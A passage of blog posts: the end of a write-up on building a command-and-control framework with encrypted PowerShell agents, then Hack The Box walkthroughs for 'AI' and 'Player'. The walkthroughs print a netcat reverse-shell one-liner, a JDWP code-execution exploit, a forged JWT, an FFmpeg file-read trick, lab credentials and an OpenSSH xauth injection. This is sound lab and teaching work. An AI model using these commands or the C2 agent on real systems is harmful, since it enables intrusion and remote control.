    enc = c.encrypt(PLAIN)

    return enc.decode()

def DECRYPT(ENC, KEY):

    c   = AESCipher(KEY)
    dec = c.decrypt(ENC)

    return dec

And finally there’s the generateKey function which creates a random 32 bytes key and base-64 encodes it:

def generateKey():

    key    = base64.b64encode(os.urandom(32))
    return key.decode()

PowerShell Agent

The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.

First function is the Create-AesManagedObject which instantiates an AesManaged object using the given key and IV. It’s a must to use the same options we decided to use on the server side which are CBC mode, zeros padding and 32 bytes key length:

function Create-AesManagedObject($key, $IV) {
    
    $aesManaged           = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize   = 256

After that it checks if the provided key and IV are of the type String (which means that the key or the IV is base-64 encoded), depending on that it decodes the data before using them, then it returns the AesManaged object.

if ($IV) {
        
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        
        else {
            $aesManaged.IV = $IV
        }
    }
    
    if ($key) {
        
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        
        else {
            $aesManaged.Key = $key
        }
    }
    
    $aesManaged
}

The Encrypt function takes a key and a plain text string, converts that string to bytes, then it uses the Create-AesManagedObject function to create the AesManaged object and it encrypts the string with a random generated IV.

It returns the cipher text base-64 encoded.

function Encrypt($key, $unencryptedString) {
    
    $bytes             = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged        = Create-AesManagedObject $key
    $encryptor         = $aesManaged.CreateEncryptor()
    $encryptedData     = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    [System.Convert]::ToBase64String($fullData)
}

The opposite of this process happens with the Decrypt function:

function Decrypt($key, $encryptedStringWithIV) {
    
    $bytes           = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV              = $bytes[0..15]
    $aesManaged      = Create-AesManagedObject $key $IV
    $decryptor       = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
    $aesManaged.Dispose()
    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)

}

Listeners / Agents Persistency

I used pickle to serialize agents and listeners and save them in databases, when you exit the server it saves all of the agent objects and listeners, then when you start it again it loads those objects again so you don’t lose your agents or listeners.

For the listeners, pickle can’t serialize objects that use threads, so instead of saving the objects themselves I created a dictionary that holds all the information of the active listeners and serialized that, the server loads that dictionary and starts the listeners again according to the options in the dictionary.

I created wrapper functions that read, write and remove objects from the databases:

def readFromDatabase(database):
    
    data = []

    with open(database, 'rb') as d:
        
        while True:
            try:
                data.append(pickle.load(d))
            except EOFError:
                break
    
    return data

def writeToDatabase(database,newData):
    
    with open(database, "ab") as d:
        pickle.dump(newData, d, pickle.HIGHEST_PROTOCOL)

def removeFromDatabase(database,name):
    
    data = readFromDatabase(database)
    final = OrderedDict()

    for i in data:
        final[i.name] = i
    
    del final[name]
    
    with open(database, "wb") as d:
        for i in final:
            pickle.dump(final[i], d , pickle.HIGHEST_PROTOCOL)

Demo

I will show you a quick demo on a Windows Server 2016 target.

This is how the home of the server looks like:




Let’s start by creating a listener:




Now let’s create a payload, I created the three available payloads:




After executing the payloads on the target we’ll see that the agents successfully contacted the server:




Let’s rename the agents:





I executed 4 simple commands on each agent:






Then I tasked each agent to quit.

And that concludes this blog post, as I said before I would appreciate all the feedback and the suggestions so feel free to contact me on twitter @Ahm3d_H3sham.

If you liked the article tweet about it, thanks for reading.

Hack The Box - AI

By: 0xRick
25 January 2020 at 05:00

Hack The Box - AI

Quick Summary

Hey guys, today AI retired and here’s my write-up about it. It’s a medium rated Linux box and its ip is 10.10.10.163, I added it to /etc/hosts as ai.htb. Let’s jump right in !


Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/AI# nmap -sV -sT -sC -o nmapinitial ai.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 17:46 EST
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.83s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.15 seconds
root@kali:~/Desktop/HTB/boxes/AI# 

We got ssh on port 22 and http on port 80.

Web Enumeration

The index page was empty:


By hovering over the logo a menu appears:


The only interesting page there was /ai.php. From the description (“Drop your query using wav file.”) my first guess was that it’s a speech recognition service that processes users’ input and executes some query based on that processed input, And there’s also a possibility that this query is a SQL query but we’ll get to that later.:


I also found another interesting page with gobuster:

root@kali:~/Desktop/HTB/boxes/AI# gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://ai.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/01/24 18:57:23 Starting gobuster
===============================================================
----------
 REDACTED
----------
/intelligence.php (Status: 200)
----------
 REDACTED
----------
===============================================================
2020/01/24 19:00:49 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/AI# 

It had some instructions on how to use their speech recognition:


I used ttsmp3.com to generate audio files and I created a test file:


But because the application only accepts wav files I converted the mp3 file with ffmpeg:

root@kali:~/Desktop/HTB/boxes/AI/test# mv ~/Downloads/ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3 .
root@kali:~/Desktop/HTB/boxes/AI/test# ffmpeg -i ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3 ttsMP3.com_VoiceText_2020-1-24_19_35_47.wav
ffmpeg version 4.2.1-2+b1 Copyright (c) 2000-2019 the FFmpeg developers
  built with gcc 9 (Debian 9.2.1-21)
  configuration: --prefix=/usr --extra-version=2+b1 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-avresample --disable-filter=resample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librsvg --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opengl --enable-sdl2 --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-shared
  libavutil      56. 31.100 / 56. 31.100
  libavcodec     58. 54.100 / 58. 54.100
  libavformat    58. 29.100 / 58. 29.100
  libavdevice    58.  8.100 / 58.  8.100
  libavfilter     7. 57.100 /  7. 57.100
  libavresample   4.  0.  0 /  4.  0.  0
  libswscale      5.  5.100 /  5.  5.100
  libswresample   3.  5.100 /  3.  5.100
  libpostproc    55.  5.100 / 55.  5.100
[mp3 @ 0x55b33e5f88c0] Estimating duration from bitrate, this may be inaccurate
Input #0, mp3, from 'ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3':
  Metadata:
    encoder         : Lavf57.71.100
  Duration: 00:00:00.63, start: 0.000000, bitrate: 48 kb/s
    Stream #0:0: Audio: mp3, 22050 Hz, mono, fltp, 48 kb/s
Stream mapping:
  Stream #0:0 -> #0:0 (mp3 (mp3float) -> pcm_s16le (native))
Press [q] to stop, [?] for help
Output #0, wav, to 'ttsMP3.com_VoiceText_2020-1-24_19_35_47.wav':
  Metadata:
    ISFT            : Lavf58.29.100
    Stream #0:0: Audio: pcm_s16le ([1][0][0][0] / 0x0001), 22050 Hz, mono, s16, 352 kb/s
    Metadata:
      encoder         : Lavc58.54.100 pcm_s16le
size=      27kB time=00:00:00.62 bitrate= 353.8kbits/s speed= 146x    
video:0kB audio:27kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 0.282118%
root@kali:~/Desktop/HTB/boxes/AI/test# 





SQL injection –> Alexa’s Credentials –> SSH as Alexa –> User Flag

As I said earlier, we don’t know what does it mean by “query” but it can be a SQL query. When I created another audio file that says it's a test I got a SQL error because of ' in it's:


The injection part was the hardest part of this box because it didn’t process the audio files correctly most of the time, and it took me a lot of time to get my payloads to work.
First thing I did was to get the database name.
Payload:

one open single quote union select database open parenthesis close parenthesis comment database




The database name was alexa, next thing I did was enumerating table names, my payload was like the one shown below and I kept changing the test after from and tried possible and common things.
Payload:

one open single quote union select test from test comment database




The table users existed.
Payload:

one open single quote union select test from users comment database




From here it was easy to guess the column names, username and password. The problem with username was that it processed user and name as two different words so I couldn’t make it work.
Payload:

one open single quote union select username from users comment database




password worked just fine.
Payload:

one open single quote union select password from users comment database




Without knowing the username we can’t do anything with the password, I tried alexa which was the database name and it worked:


We owned user.

JDWP –> Code Execution –> Root Shell –> Root Flag

Privilege escalation on this box was very easy, when I checked the running processes I found this one:

alexa@AI:~$ ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
----------
 REDACTED
----------
root      89984 18.8  5.4 3137572 110120 ?      Sl   22:44   0:06 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
----------
 REDACTED
----------
alexa@AI:~$

This was related to an Apache Tomcat server that was running on localhost, I looked at that server for about 10 minutes but it was empty and I couldn’t do anything there, it was a rabbit hole. If we check the listening ports we’ll see 8080, 8005 and 8009 which is perfectly normal because these are the ports used by tomcat, but we’ll also see 8000:

alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8009          :::*                    LISTEN      -
alexa@AI:~$ 

A quick search on that port and how it’s related to tomcat revealed that it’s used for debugging, jdwp is running on that port.

The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). -docs.oracle.com

By looking at the process again we can also see this parameter given to the java binary:

-agentlib:jdwp=transport=dt_socket,address=localhost:8000

I searched for exploits for the jdwp service and found this exploit. I uploaded the python script on the box and I added the reverse shell payload to a file and called it pwned.sh then I ran the exploit:

alexa@AI:/dev/shm$ nano pwned.sh 
alexa@AI:/dev/shm$ chmod +x pwned.sh 
alexa@AI:/dev/shm$ cat pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'

Then from another ssh session I triggered a connection on port 8005:

alexa@AI:~$ nc localhost 8005


And the code was executed:

alexa@AI:/dev/shm$ nano pwned.sh 
alexa@AI:/dev/shm$ chmod +x pwned.sh 
alexa@AI:/dev/shm$ cat pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1
[+] Selected payload '/dev/shm/pwned.sh'
[+] Command string object created id:c31
[+] Runtime.getRuntime() returned context id:0xc32
[+] found Runtime.exec(): id=7f40bc03e7c8
[+] Runtime.exec() successful, retId=c33
[!] Command successfully executed
alexa@AI:/dev/shm$ 




And we owned root ! That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Player

Hack The Box - Player

By: 0xRick
18 January 2020 at 05:00

Hack The Box - Player

Quick Summary

Hey guys, today Player retired and here’s my write-up about it. It was a relatively hard CTF-style machine with a lot of enumeration and a couple of interesting exploits. It’s a Linux box and its ip is 10.10.10.145, I added it to /etc/hosts as player.htb. Let’s jump right in !




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/player# nmap -sV -sT -sC -o nmapinitial player.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 16:29 EST
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
|   2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
|   256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_  256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.7
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.12 seconds
root@kali:~/Desktop/HTB/boxes/player# 

We got http on port 80 and ssh on port 22.

Web Enumeration

I got a 403 response when I went to http://player.htb/:


I used wfuzz with subdomains-top1mil-5000.txt from seclists to enumerate virtual hosts and got these results:

root@kali:~/Desktop/HTB/boxes/player# wfuzz --hc 403 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://10.10.10.145/
Total requests: 4997
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000019:   200        86 L     229 W    5243 Ch     "dev"
000000067:   200        63 L     180 W    1470 Ch     "staging"
000000070:   200        259 L    714 W    9513 Ch     "chat"

Total time: 129.1540
Processed Requests: 4997
Filtered Requests: 4994
Requests/sec.: 38.69021

root@kali:~/Desktop/HTB/boxes/player# 

I added them to my hosts file and started checking each one of them.
On dev there was an application that needed credentials so we’ll skip that one until we find some credentials:


staging was kinda empty but there was an interesting contact form:




The form was interesting because when I attempted to submit it I got a weird error for a second then I got redirected to /501.php:



I intercepted the request with burp to read the error.
Request:

GET /contact.php?firstname=test&subject=test HTTP/1.1
Host: staging.player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging.player.htb/contact.html
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Fri, 17 Jan 2020 19:54:33 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
refresh: 0;url=501.php
Vary: Accept-Encoding
Content-Length: 818
Connection: close
Content-Type: text/html

array(3) {
  [0]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(6)
    ["function"]=>
    string(1) "c"
    ["args"]=>
    array(1) {
      [0]=>
      &string(9) "Cleveland"
    }
  }
  [1]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(3)
    ["function"]=>
    string(1) "b"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Glenn"
    }
  }
  [2]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(11)
    ["function"]=>
    string(1) "a"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Peter"
    }
  }
}
Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php

The error exposed some filenames like /var/www/backup/service_config, /var/www/staging/fix.php and /var/www/staging/contact.php. That will be helpful later.
chat was a static page that simulated a chat application:


I took a quick look at the chat history between Olla and Vincent, Olla asked him about some pentest reports and he replied with 2 interesting things :



  1. Staging exposing sensitive files.
  2. Main domain exposing source code allowing to access the product before release.

We already saw that staging was exposing files, I ran gobuster on the main domain and found /launcher:

root@kali:~/Desktop/HTB/boxes/player# gobuster dir -u http://player.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://player.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/17 19:17:29 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/launcher (Status: 301)
/server-status (Status: 403)
===============================================================
2020/01/17 19:18:59 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/player# 

http://player.htb/launcher:


I tried to submit that form but it did nothing, I just got redirected to /launcher again: Request:

GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzU
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:45:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: index.html
Content-Length: 0
Connection: close
Content-Type: text/html

We know from the chat that the source code is exposed somewhere, I wanted to read the source of /launcher/dee8dc8a47256c64630d803a4c40786c.php so I tried some basic stuff like adding .swp, .bak and ~ after the file name. ~ worked (check this out):

root@kali:~/Desktop/HTB/boxes/player# curl http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786c.php~
<?php
require 'vendor/autoload.php';

use \Firebase\JWT\JWT;

if(isset($_COOKIE["access"]))
{
        $key = '_S0_R@nd0m_P@ss_';
        $decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
        if($decoded->access_code === "0E76658526655756207688271159624026011393")
        {
                header("Location: 7F2xxxxxxxxxxxxx/");
        }
        else
        {
                header("Location: index.html");
        }
}
else
{
        $token_payload = [
          'project' => 'PlayBuff',
          'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
        ];
        $key = '_S0_R@nd0m_P@ss_';
        $jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
        $cookiename = 'access';
        setcookie('access',$jwt, time() + (86400 * 30), "/");
        header("Location: index.html");
}

?>
root@kali:~/Desktop/HTB/boxes/player#

It decodes the JWT token from the cookie access and redirects us to a redacted path if the value of access_code was 0E76658526655756207688271159624026011393, otherwise it will assign an access cookie for us with C0B137FE2D792459F26FF763CCE44574A5B5AB03 as the value of access_code and redirect us to index.html.
We have the secret _S0_R@nd0m_P@ss_ so we can easily craft a valid cookie. I used jwt.io to edit my token.




I used the cookie and got redirected to /7F2dcsSdZo6nj3SNMTQ1: Request:

GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:50:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html




FFmpeg HLS Vulnerability –> Arbitrary File Read

I uploaded a test txt file:



I got an avi file as a result which was weird:

<a href="http:\/\/player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/uploads/518515582.avi">

I tried some other file formats and I also got an avi file.
So I tried the ffmpeg HLS exploit, I created a test avi to read /etc/passwd and it worked:

root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///etc/passwd test.avi
root@kali:~/Desktop/HTB/boxes/player/avi# file test.avi 
test.avi: RIFF (little-endian) data, AVI, 224 x 160, 25.00 fps,
root@kali:~/Desktop/HTB/boxes/player/avi#




I created 3 more avis to read the files we got earlier from the error message from staging:

root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/staging/contact.php contact.avi
root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/backup/service_config service_config.avi
root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/staging/fix.php fix.avi
root@kali:~/Desktop/HTB/boxes/player/avi#

contact.php didn’t have anything interesting and the avi for fix.php was empty for some reason. In service_config there were some credentials for a user called telegen:


I tried these credentials with ssh and with dev.player.htb and they didn’t work. I ran a quick full port scan with masscan and turns out that there was another open port:

root@kali:~/Desktop/HTB/boxes/player# masscan -p1-65535 10.10.10.145 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-18 00:09:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145                                    
Discovered open port 80/tcp on 10.10.10.145                                    
Discovered open port 6686/tcp on 10.10.10.145

I scanned that port with nmap but it couldn’t identify the service:

PORT     STATE SERVICE    VERSION
6686/tcp open  tcpwrapped

However when I connected to the port with nc the banner indicated that it was an ssh server:

root@kali:~/Desktop/HTB/boxes/player# nc player.htb 6686
SSH-2.0-OpenSSH_7.2

Protocol mismatch.
root@kali:~/Desktop/HTB/boxes/player#

I could login to that ssh server with the credentials, but unfortunately I was in a restricted environment:

root@kali:~/Desktop/HTB/boxes/player# ssh [email protected] -p 6686
The authenticity of host '[player.htb]:6686 ([10.10.10.145]:6686)' can't be established.
ECDSA key fingerprint is SHA256:oAcCXvit3SHvyq7nuvWntLq+Q+mGlAg8301zhKnJmPM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[player.htb]:6686,[10.10.10.145]:6686' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Last login: Tue Apr 30 18:40:13 2019 from 192.168.0.104
Environment:
  USER=telegen
  LOGNAME=telegen
  HOME=/home/telegen
  PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
  MAIL=/var/mail/telegen
  SHELL=/usr/bin/lshell
  SSH_CLIENT=10.10.xx.xx 43270 6686
  SSH_CONNECTION=10.10.xx.xx 43270 10.10.10.145 6686
  SSH_TTY=/dev/pts/4
  TERM=screen
========= PlayBuff ==========
Welcome to Staging Environment

telegen:~$ whoami
*** forbidden command: whoami
telegen:~$ help
  clear  exit  help  history  lpath  lsudo
telegen:~$ lsudo
Allowed sudo commands:
telegen:~$ lpath
Allowed:
 /home/telegen
telegen:~$ pwd
*** forbidden command: pwd
telegen:~$ 

OpenSSH 7.2p1 xauth Command Injection –> User Flag

When I searched for exploits for that version of openssh I found this exploit.

root@kali:~/Desktop/HTB/boxes/player# python 39569.py 
 Usage: <host> <port> <username> <password or path_to_privkey>
        
        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
        

root@kali:~/Desktop/HTB/boxes/player# python 39569.py player.htb 6686 telegen 'd-bC|jC!2uepS/w'
INFO:__main__:connecting to: telegen:d-bC|jC!2uepS/[email protected]:6686
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
telegen:x:1000:1000:telegen,,,:/home/telegen:/usr/bin/lshell
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL
colord:x:106:116:colord
